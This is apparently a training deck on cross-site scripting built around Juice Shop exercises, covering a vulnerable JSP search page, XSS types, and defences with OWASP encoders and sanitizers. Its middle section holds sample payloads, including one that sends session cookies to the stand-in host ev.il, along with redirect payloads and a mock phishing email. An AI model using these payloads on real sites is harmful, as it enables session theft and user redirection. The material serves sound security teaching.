- An attacker can use XSS to send a malicious script to an unsuspecting user
- The end user’s browser has no way to know that the script should not be trusted, and will execute the script
- Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site
- These scripts can even rewrite the content of the HTML page
Web applications vulnerable to XSS...
- ...include untrusted data (usually from an HTTP request) into dynamic content...
- ...that is then sent to a web user without previously validating for malicious content
ℹ️ XSS originally had its own category, e.g. A7:2017-Cross-Site Scripting (XSS). Since 2021 it is considered part of the Injection category.
- Steal user's session
- Steal sensitive data
- Rewrite the web page
- Redirect user to malicious website
Dear valued customer!
You won our big lottery which you might not even have participated in! Click on the following totall inconspicious link to claim your prize now!
CLICK HER! FREE STUFF! YOU WON!
Sincereely yours,
Bjorn Kimminich CEO of Juice Shop Inc.
Juice Shop Inc. is registered as a bla bla bla bla yadda yadda yadda more assuring legal bla All logos and icons are trademarks of Juice Shop Inc. Copyright (c) 2018 Juice Shop Inc.
ℹ️ This video shows how severe the impact of XSS can be: It makes the application shake & dance and lets a keylogger steal user credentials!
<!--search.jsp-->
<%String searchCriteria = request.getParameter("searchValue");%>
might forward to the following page when executing the search:
<!--results.jsp-->
Search results for <b><%=searchCriteria%></b>:
<table>
<!-- Render the actual results table here -->
</table>
https://my-little-application.com/search.jsp?searchValue=blablubb
results in the following HTML on the results.jsp page:
Search results for <b>blablubb</b>:rendering as:
Search results for blablubb:
https://my-little-application.com/search.jsp?searchValue=</b><img src="https://placekitten.com/g/100/100"/><b>
results in the following HTML on the results.jsp page:
Search results for
<b></b><img src="https://placekitten.com/g/100/100"/><b></b>:rendering as:
Search results for :
<script>
new Image().src="http://ev.il/hijack.php?c="+encodeURI(document.cookie);
</script>
<script>document.body.background="http://ev.il/image.jpg";</script>
<script>window.location.assign("http://ev.il");</script>
- Reflected XSS: Application includes unvalidated and unescaped user input as part of HTML output
- Stored XSS: Application stores unsanitized user input that is viewed at a later time by another user
- DOM XSS: JavaScript frameworks & single-page applications dynamically include attacker-controllable data to a page
ℹ️ The previous example vulnerability and exploit of
results.jsp is a typical Reflected XSS.
- Identify places where user input is directly included in the output
- Perform a successful DOM XSS attack (:star:)
- Perform a successful Reflected XSS attack (:star::star:)
- Do not include user supplied input in your output! 💯
- Output Encode all user supplied input
- e.g. OWASP Java Encoder
- Perform Allow List Input Validation on user input
- Use an HTML Sanitizer for larger user supplied HTML chunks
- e.g. OWASP Java HTML Sanitizer
Using Encoder from
OWASP Java Encoder Project:
<%import org.owasp.encoder.Encode;%>
Search results for <b><%=Encode.forHtml(searchCriteria)%></b>:
<!-- ... -->
Same result using HtmlUtils from the popular Spring framework:
<%import org.springframework.web.util.HtmlUtils;%>
Search results for <b><%=HtmlUtils.htmlEscape(searchCriteria)%></b>:
<!-- ... -->
<textarea name="text"><%= Encode.forHtmlContent(UNTRUSTED) %></textarea>
<input type="text"
name="address"
value="<%= Encode.forHtmlAttribute(UNTRUSTED) %>" />
Alternatively Encode.forHtml(UNTRUSTED) can be used for both the
above contexts but is less efficient as it encodes more characters.
<script type="text/javascript">
var msg = "<%= Encode.forJavaScriptBlock(UNTRUSTED) %>";
alert(msg);
</script>
<button onclick="alert('<%= Encode.forJavaScriptAttribute(UNTRUSTED) %>');">
click me
</button>
Alternatively Encode.forJavaScript(UNTRUSTED) can be used for both
the above contexts but is less efficient as it encodes more characters.
<div style="width:<= Encode.forCssString(UNTRUSTED) %>">
<div style="background:<= Encode.forCssUrl(UNTRUSTED) %>">
<a href="/search?value=<%= Encode.forUriComponent(UNTRUSTED) %>&order=1#top">
<a href="/page/<%= Encode.forUriComponent(UNTRUSTED) %>">
Fast and easy to configure HTML Sanitizer written in Java which lets you include HTML authored by third-parties in your web application while protecting against XSS.
private String sanitizeHtml(String html) {
PolicyFactory policy = Sanitizers.FORMATTING.and(Sanitizers.BLOCKS)
.and(Sanitizers.LINKS);
return policy.sanitize(html);
}private static final PolicyFactory BASIC_FORMATTING_WITH_LINKS_POLICY =
new HtmlPolicyBuilder()
.allowCommonInlineFormattingElements().allowCommonBlockElements()
.allowAttributes("face", "color", "size", "style").onElements("font")
.allowAttributes("style").onElements("div", "span").allowElements("a")
.allowAttributes("href").onElements("a").allowStandardUrlProtocols()
.requireRelNofollowOnLinks().toFactory();This custom policy actually reflects the features of a 3rd-party rich text editor widget for GWT applications the author once used.
- "Allow what is not explicitly blocked!"
- Example: Do not allow
<,>,",;,'andscriptin user input (:interrobang:)
- Example: Do not allow
- Can be bypassed by masking attack patterns
- Must be updated for new attack patterns
= Negative Security Rule
- "Block what is not explicitly allowed!"
- Example: Allow only
a-z,A-Zand0-9in user input
- Example: Allow only
- Provide protection even against future vulnerabilities
- Tend to get weaker over time when not carefully maintained
- Can be quite effortsome to define for a whole application
= Positive Security Rule
- Client Side Validation is always for convenience but never for security!
- You can just stop all outgoing HTTP requests in your browser...
- ...and tamper with contained headers, data or passed parameters
- ...after Client Side Validation took place
- ...but before they are actually submitted to the server
- Sometimes you can just bypass the client entirely and interact with the backend instead
- Identify places where stored user input is displayed elsewhere
- Perform any Stored XSS attack successfully (:star::star: - :star::star::star::star::star::star:)
- Visit the page where the attack gets executed to verify your success
ℹ️ If your attack seems to be blocked or otherwise prevented, you can either try to somehow beat the security mechanism or just find an easier target! You can always come back to the harder challenges with more knowledge on how to bypass certain security controls.